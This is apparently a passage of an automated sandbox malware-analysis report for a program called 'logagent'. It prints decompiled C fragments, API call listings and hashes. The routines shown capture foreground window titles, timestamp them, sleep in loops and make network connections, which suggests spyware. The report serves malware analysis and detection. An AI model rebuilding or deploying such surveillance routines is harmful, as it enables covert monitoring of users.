					_t3 =  &(_v20.wSecond); // 0x4051ef
					_t26 =  &_v84;
					L00414176();
					_t27 =  &_v68;
					L00414170();
					_t28 =  &_v52;
					L00414140();
					_t29 =  &_v36;
					L00414170();
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t29, _t28, _t28, _t27, _t27, _t26, _t26, "%02i:%02i:%02i:%03i ",  &_a4, " ",  &_a20, 0x415770, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff,  *_t3 & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff);
					_t18 = printf(_t29);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t18;
			}













                                  0x00412048
                                  0x00412052
                                  0x0041205d
                                  0x0041207e
                                  0x00412087
                                  0x00412090
                                  0x00412094
                                  0x0041209d
                                  0x004120a1
                                  0x004120aa
                                  0x004120ae
                                  0x004120b8
                                  0x004120bf
                                  0x004120cb
                                  0x004120d4
                                  0x004120dd
                                  0x004120e6
                                  0x004120e6
                                  0x004120ef
                                  0x004120f8
                                  0x004120ff

                                  APIs
                                  • GetLocalTime.KERNEL32(?), ref: 00412052
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                  • printf.MSVCRT ref: 004120BF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                  • String ID: %02i:%02i:%02i:%03i $Q@
                                  • API String ID: 4249031962-3186260181
                                  • Opcode ID: 8b184078008214c64558b86fa97955d693c666b74ff00cfecb2717c51fbe4e8b
                                  • Instruction ID: f3ca9ea98f16ce9d12e0c862744fbe2e8a9e2291361fb12ebe279ffe92a69474
                                  • Opcode Fuzzy Hash: 8b184078008214c64558b86fa97955d693c666b74ff00cfecb2717c51fbe4e8b
                                  • Instruction Fuzzy Hash: 9311D3B680011DFBCF01EBE1EC49DEF7B7CBA54745B044026F912D2061EB789699CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405812 Relevance: 25.6, APIs: 17, Instructions: 138COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 00405853
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405868
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405874
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(7620F560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,7620F560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405898
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004058AE
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058B7
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004058CC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058D6
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405902
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405922
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040590C
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405943
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040594D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405963
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405974
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040597F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,0041B310), ref: 00405994
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@D@1@@$?data@?$basic_string@?length@?$basic_string@G@2@@std@@G@std@@V01@@$?empty@?$basic_string@CreateFileconnect
                                  • String ID:
                                  • API String ID: 257471410-0
                                  • Opcode ID: bfad978402414b96830ffb0230ed567a8252c16ae122ddb7cdec71540450921e
                                  • Instruction ID: a7298ed754ce3842782531f55b1250d517e56450e3269786ed83483861d592cb
                                  • Opcode Fuzzy Hash: bfad978402414b96830ffb0230ed567a8252c16ae122ddb7cdec71540450921e
                                  • Instruction Fuzzy Hash: 034152B2D00508ABCB05FBA1ED5A9EE7738DF54304B10407AE912B71D2EB795F48CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412F73 Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 30%
                                  			E00412F73(char _a4, void* _a20) {
				char _v5;
				void* _v24;
				char _v40;
				int _t26;
				int _t29;
				void* _t37;
				unsigned int _t66;
				signed int _t67;
				int _t70;
				signed short _t73;
				struct HWND__* _t81;
				void* _t83;

				_t81 = GetForegroundWindow();
				_t26 = GetWindowTextLengthA(_t81);
				_t89 = _t26;
				if(_t26 <= 0) {
					L6:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 0;
				}
				_t28 = _t26 + 1;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z( &_v5);
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t29 = GetWindowTextA(_t81, _t26 + 1, _t26 + 1);
				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
				__imp__?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
				__imp__?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ();
				E00413A29(_t29, _t29, _t29, __imp__tolower);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(_t89,  &_v40,  &_a4, 0x415b80,  &_v5, _t28, 0);
				_t73 = 0;
				if(E00401838( &_v40) <= 0) {
					L5:
					E004017DD( &_v40);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					goto L6;
				}
				_t82 = 0;
				while(1) {
					_t37 = E0040180C( &_v40, 0, _t82);
					__imp__?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z(_t37, 0);
					if(_t37 !=  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
						break;
					}
					_t73 = _t73 + 1;
					_t82 = _t73 & 0x0000ffff;
					if((_t73 & 0x0000ffff) < E00401838( &_v40)) {
						continue;
					}
					goto L5;
				}
				__eflags = _a20;
				if(_a20 != 0) {
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					asm("repne scasb");
					_t66 =  !( &_v24 | 0xffffffff);
					_t83 = _t37 - _t66;
					_t67 = _t66 >> 2;
					_t70 = memcpy(_a20, _t83, _t67 << 2) & 0x00000003;
					__eflags = _t70;
					memcpy(_t83 + _t67 + _t67, _t83, _t70);
				}
				E004017DD( &_v40);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 1;
			}















                                  0x00412f81
                                  0x00412f84
                                  0x00412f8a
                                  0x00412f8c
                                  0x00413063
                                  0x00413066
                                  0x00000000
                                  0x0041306c
                                  0x00412f95
                                  0x00412f9d
                                  0x00412fa6
                                  0x00412fb0
                                  0x00412fb8
                                  0x00412fc7
                                  0x00412fd1
                                  0x00412fdb
                                  0x00412fe2
                                  0x00412ff2
                                  0x00413001
                                  0x0041300b
                                  0x00413016
                                  0x0041301f
                                  0x00413052
                                  0x00413055
                                  0x0041305d
                                  0x00000000
                                  0x0041305d
                                  0x00413021
                                  0x00413023
                                  0x00413029
                                  0x00413032
                                  0x00413040
                                  0x00000000
                                  0x00000000
                                  0x00413042
                                  0x00413046
                                  0x00413050
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00413050
                                  0x00413072
                                  0x00413076
                                  0x0041307b
                                  0x00413088
                                  0x0041308a
                                  0x00413090
                                  0x00413095
                                  0x0041309c
                                  0x0041309c
                                  0x0041309f
                                  0x0041309f
                                  0x004130a4
                                  0x004130ac
                                  0x004130b5
                                  0x00000000

                                  APIs
                                  • GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                  • GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                  • GetWindowTextA.USER32 ref: 00412FB8
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                  • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
                                  • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0041307B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@$D@1@@V12@Window$?begin@?$basic_string@?c_str@?$basic_string@?find@?$basic_string@TextV01@@$??4?$basic_string@?end@?$basic_string@?substr@?$basic_string@ForegroundLengthV01@
                                  • String ID:
                                  • API String ID: 3496238640-0
                                  • Opcode ID: 4cce06ad55edbceb2eb1acd16d276c83b26923f47a7b414541e37ea5d0900f90
                                  • Instruction ID: d45ca6ef39ea3e178db3ab1d94ac08b999b831b850f622e5a8fdf4a981eaba08
                                  • Opcode Fuzzy Hash: 4cce06ad55edbceb2eb1acd16d276c83b26923f47a7b414541e37ea5d0900f90
                                  • Instruction Fuzzy Hash: 02414E32500509DBCB04EFA1DD5A9EE7BB8EF94342B10416AF803A31A0EF745F45CA69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004053DA Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 85sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00405423
                                    • Part of subcall function 00412F73: GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                    • Part of subcall function 00412F73: GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                    • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                    • Part of subcall function 00412F73: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                    • Part of subcall function 00412F73: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                    • Part of subcall function 00412F73: GetWindowTextA.USER32 ref: 00412FB8
                                    • Part of subcall function 00412F73: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                    • Part of subcall function 00412F73: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
                                    • Part of subcall function 00412F73: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                    • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                    • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                    • Part of subcall function 00412F73: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                    • Part of subcall function 00412F73: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                    • Part of subcall function 00412F73: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                  • Sleep.KERNEL32(000001F4), ref: 0040543A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, ]), ref: 00405451
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,00000000), ref: 00405461
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040546E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040547D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405486
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040548F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405498
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004054A7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 004054C5
                                  • Sleep.KERNEL32(00000064), ref: 004054D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@V01@@$D@1@@Window$?begin@?$basic_string@D@2@@0@Hstd@@SleepTextV?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@ForegroundG@2@@std@@G@std@@LengthV01@V10@V10@@V12@
                                  • String ID: [ $ ]
                                  • API String ID: 3011177377-93608704
                                  • Opcode ID: b17b501f1748e2fb1ab18a7c3d85fa49411d46d8c8bbb0057a51120c035d8143
                                  • Instruction ID: b52ba732bfb27aa553af63110ce50c569faff7b52b45cf0ea854f8293cee1314
                                  • Opcode Fuzzy Hash: b17b501f1748e2fb1ab18a7c3d85fa49411d46d8c8bbb0057a51120c035d8143
                                  • Instruction Fuzzy Hash: A9219571A00508BBCB00B7A4DC5ABEF7B78EF44344F004176F602A3192DF7455898B9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403744 Relevance: 24.1, APIs: 16, Instructions: 67stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310), ref: 00403752
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040375B
                                  • GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00403773
                                  • _itoa.MSVCRT ref: 0040377A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00403790
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403798
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 004037A7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004037B4
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004037C0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037C9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037D2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037DB
                                  • lstrlenA.KERNEL32(00000000), ref: 004037E2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004037F8
